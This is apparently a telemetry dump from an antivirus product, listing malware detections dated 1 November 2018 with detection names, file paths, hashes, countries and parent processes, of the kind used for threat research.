  Row(detection=Row(filename='avscan-20181101-190734-b7ba7482', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-190537-9ECF88BD\\AVSCAN-20181101-190734-B7BA7482', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:07:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T13:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144853-d62ea60a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61c375b4\\AVSCAN-20181101-144826-D1B8DDEB\\AVSCAN-20181101-144853-D62EA60A', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-064544-cbb6850a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d787a023\\AVSCAN-20181102-064523-C8E9B94B\\AVSCAN-20181102-064544-CBB6850A', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:45:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T19:58:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122308-a85f6e7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd46ccc4\\AVSCAN-20181101-122229-A0D6649D\\AVSCAN-20181101-122308-A85F6E7A', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:23:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T08:46:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T13:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T19:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T12:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T12:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T09:06:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T09:06:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0bacb1e5fd958ad0346be3a7500eaa97e2e21a35a98695f9af103d52ed4e0208', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\0BACB1E5FD958AD0346BE3A7500EAA97E2E21A35A98695F9AF103D52ED4E0208', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bacb1e5fd958ad0346be3a7500eaa97e2e21a35a98695f9af103d52ed4e0208', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:03:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='العاب.exe', filepath='D:\\العاب\\العاب.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='0c744eeabe3b9d51114647b7d603de2bcd16f14ac8aaa6b0f5dc665895bdf719', metadata=Row(cmdline='\\\\\\/connectToHost ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Launcher\\Avira.Systray.exe', parentsize=307184, timestamp='2018-11-01T22:30:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='العاب.exe', filepath='D:\\العاب\\العاب.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='0c744eeabe3b9d51114647b7d603de2bcd16f14ac8aaa6b0f5dc665895bdf719', metadata=Row(cmdline='\\\\\\/connectToHost ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Launcher\\Avira.Systray.exe', parentsize=307184, timestamp='2018-11-01T18:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lgmupgradedl.dll', filepath='E:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.442\\FlashTool.1.0.54英文版\\KDZ_FW_UPD_EN\\LGMUpgradeDL.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='0c7547ae531a11e8de775fe1da665dd4ad4ed666bafc949ba1a2c417568518d0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:36:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0c8b7dfebfc3ecaa33ba41678ebd0ea96d6e7aabb796cd268b46f63e5b2e72c7.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0C8B7DFEBFC3ECAA33BA41678EBD0EA96D6E7AABB796CD268B46F63E5B2E72C7.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0c8b7dfebfc3ecaa33ba41678ebd0ea96d6e7aabb796cd268b46f63e5b2e72c7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:15:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wdsw.exe', filepath='d:\\bereau المكتب 2018\\hicham\\wlan_wiz\\fra\\wdsw.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='0cd5ca1c57f6e50bc116bcce1d517d464ed2df6fc4c11ad385b836e0bedaacdf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\Program Files\\Counter-Strike Xtreme V6\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='0d035a2cb0ae8a93bea6cffe9e2e40335f511afb26f966336f217661055274a5', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:26:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe18_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe18 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:15:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe28_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe28 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epm.exe', filepath='\\\\?\\E:\\02. Sharing Data\\Approved GRTT\\RAA\\Approved 2013\\Approved All eks\\epm.exe', filesize=26560000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='0d1edef1a6d85204125782adcaaedad471c5576efea6832875e74b4b364a9349', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epm.exe', filepath='\\\\?\\E:\\02. Sharing Data\\Approved GRTT\\RAA\\Approved 2013\\Approved All eks\\epm.exe', filesize=26560000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='0d1edef1a6d85204125782adcaaedad471c5576efea6832875e74b4b364a9349', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143302-ef5e8753', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-142722-D9B1446B\\AVSCAN-20181101-143302-EF5E8753', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='0d2d6a22909d41cd4a4a05ccdedeb4240bc9464b1d44c0cec86029ac3cec1502', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='службная записка ключи от зала ихибт_2.exe', filepath='E:\\УФКиС\\служебные записки\\службная записка ключи от зала ИХИБТ_2.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0d2d6a22909d41cd4a4a05ccdedeb4240bc9464b1d44c0cec86029ac3cec1502', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:12:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0d397b7b7ef9970978d609a0a6fc72e053c879dac5a0e7821667083c5a31e2de.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0D397B7B7EF9970978D609A0A6FC72E053C879DAC5A0E7821667083C5A31E2DE.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0d397b7b7ef9970978d609a0a6fc72e053c879dac5a0e7821667083c5a31e2de', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:16:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172208-cf3294bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-172208-CF3294BC', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='0d941b5226c82804d490653cb4464e1b60b6439e7e0a901fcc563ec1437f17be', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rdaintd', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RDAINTD', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='0d941b5226c82804d490653cb4464e1b60b6439e7e0a901fcc563ec1437f17be', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=36000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='0dd7b989deda6fac6c8b0231a910e5534802bf313207b734bdec25ba0be41928', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:45:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T07:35:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:50:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:14:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalServiceNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:39:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7095c6bd4efe1ae956baa18ed326aa7b853d655a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\7095c6bd4efe1ae956baa18ed326aa7b853d655a', filesize=2176000, name='W32/Virut.Gen.#M1.#R1'), hash='0e40e4b9dadce697e5d511832ed269a2f10efbd8d60f78f4d223df89e138d483', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csproj.dll', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VC#\\VCSPackages\\csproj.dll', filesize=1984000, name='W32/Ramnit.CD.#M1.#R1'), hash='0e6ee395a2a9ee46eccfddff00e83536bb187d60776d63cffc76c7702e18c466', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T20:33:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0e7ac1eb7df5d875acc83c61dd272eda167c78f9758b0cfd7b176cda6cf8d61b.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0E7AC1EB7DF5D875ACC83C61DD272EDA167C78F9758B0CFD7B176CDA6CF8D61B.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0e7ac1eb7df5d875acc83c61dd272eda167c78f9758b0cfd7b176cda6cf8d61b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:17:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='000023', filepath='./Malware_20181025/20181025_Total/000023', filesize=320000, name='TR/BitCoinMiner.grbmu.#M0.#R0'), hash='0e92444bdc28dbd0e645cedb0c7f1d81708e2073b7c7567956b7bc665cb6b648', metadata=Row(cmdline=None, country='TW', os_name='Linux', os_vmajor='Ubuntu 14', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-01T02:21:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.17514_none_75618ca379b78941\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='0ebc7b2c2e54fa07ef88562ec2ffeb2c6320ee013de351ea464cd8b8e1c7ff8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.17514_none_75618ca379b78941\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='0ebc7b2c2e54fa07ef88562ec2ffeb2c6320ee013de351ea464cd8b8e1c7ff8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adorage.dll', filepath='\\\\?\\C:\\Program Files\\CyberLink\\Shared Files\\PlugIn\\proDAD\\adorage.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f1aadc40295db58302849cfe1f06bbee568c045c4997fa7ac177fd19f928106', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:17:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emailloginnow.exe.148639.gzquar', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\7T7AVDAZ\\emailloginnow.exe.148639.gzquar', filesize=652000, name='HEUR/AGEN.1020989.#M1.#R1'), hash='0f35d300d9b6d218d692750ec255066d606c18b89946187d55c2430b9848bee9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:21:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lfx270.dll', filepath='C:\\Program Files (x86)\\LEICA Geosystems\\LEICA Geo Office\\Combined\\Bin\\Lfx270.dll', filesize=1856000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f603bae43f08ff7de78704138713f20eba0404cacbe9fc7defa95fda87d3fcd', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:29:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avr-c++.exe', filepath='C:\\Program Files\\arduino-nightly-windows\\arduino-nightly\\hardware\\tools\\avr\\bin\\avr-c++.exe', filesize=832000, name='W32/Sality.AT.#M1.#R1'), hash='0faaff548338c98a2259dd3f448a1d1e7aac1ee6b23920aab264af493931a4a8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Xg+itGwObkS3o7o9.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-01T00:00:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='10696ea7f10bc7fb3349ec33519f5a6fe7902b07099692f84f0b233a028bbe52', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\10696EA7F10BC7FB3349EC33519F5A6FE7902B07099692F84F0B233A028BBE52', filesize=1984000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='10696ea7f10bc7fb3349ec33519f5a6fe7902b07099692f84f0b233a028bbe52', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:31:33Z'), dt=datetime.date(2018, 11, 1)),
